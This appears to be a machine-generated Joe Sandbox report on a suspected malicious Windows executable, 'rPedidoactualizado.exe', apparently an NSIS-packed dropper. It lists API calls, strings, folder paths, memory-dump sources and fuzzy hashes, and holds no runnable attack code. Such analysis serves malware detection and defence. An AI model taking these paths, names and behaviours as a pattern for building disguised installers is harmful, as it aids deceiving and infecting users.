lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF

Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB

RegisterClassW.USER32(007A79C0), ref: 00403B2C
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
ShowWindow.USER32(00000005,00000000), ref: 00403BAF
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
RegisterClassW.USER32(007A79C0), ref: 00403BF1
DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10

Strings

RichEd20, xrefs: 00403BB5
C:\Users\user\AppData\Local\Temp\, xrefs: 00403993
RichEdit, xrefs: 00403BE2
_Nb, xrefs: 00403B0B, 00403B73
"C:\Users\user\Desktop\rPedidoactualizado.exe", xrefs: 0040398B
: Completed, xrefs: 00403A4F, 00403A58, 00403A66, 00403AB5, 00403ABB
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00403A17, 00403A1F, 00403AC2, 00403AC8, 00403AD8
1033, xrefs: 004039A7, 00403A03
.exe, xrefs: 00403A95
Control Panel\Desktop\ResourceLocale, xrefs: 004039BB
.DEFAULT\Control Panel\International, xrefs: 004039F3
RichEd32, xrefs: 00403BC3
RichEdit20W, xrefs: 00403BD3, 00403BD9

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3530490560
Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rPedidoactualizado.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPedidoactualizado.exe,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

Error launching installer, xrefs: 00402F2D
C:\Users\user\Desktop\rPedidoactualizado.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
Null, xrefs: 00402FD4
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
soft, xrefs: 00402FCB
Inst, xrefs: 00402FC2
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
"C:\Users\user\Desktop\rPedidoactualizado.exe", xrefs: 00402EDD
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
vy, xrefs: 00402F6B

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rPedidoactualizado.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-3281621571
Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
CoTaskMemFree.OLE32(?), ref: 00406462
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406482
halituses, xrefs: 004062DE
: Completed, xrefs: 004062E3, 004063BE, 004063C5, 004063C9, 004063E3, 004063E4, 004063F9, 0040640C, 00406428, 00406453, 00406487, 0040648D, 004064A9, 004064BC, 004064D9, 004064DF, 004064EB, 0040651E
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063CA

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
API String ID: 717251189-3468386958
Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017D5

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Strings

C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp$C:\Users\user\AppData\Local\Temp\nsx2132.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 1941528284-264205256
Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Strings

halituses, xrefs: 00405320, 00405330, 00405336, 00405359, 00405365

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: halituses
API String ID: 2531174081-2845610232
Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
wsprintfW.USER32 ref: 00406653
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667

Strings

\, xrefs: 00406629
%s%S.dll, xrefs: 0040664D
UXTHEME, xrefs: 0040660A

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403180
GetTickCount.KERNEL32 ref: 00403204
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 0040322D
wsprintfW.USER32 ref: 00403240

Strings

... %d%%, xrefs: 0040323A

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
GetLastError.KERNEL32 ref: 00405825
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
GetLastError.KERNEL32 ref: 00405844

Strings

C:\Users\user\Desktop, xrefs: 004057CE

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1246513382
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DDA
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rPedidoactualizado.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6), ref: 00405DF5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DC1, 00405DC5
"C:\Users\user\Desktop\rPedidoactualizado.exe", xrefs: 00405DBC
nsa, xrefs: 00405DC9

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
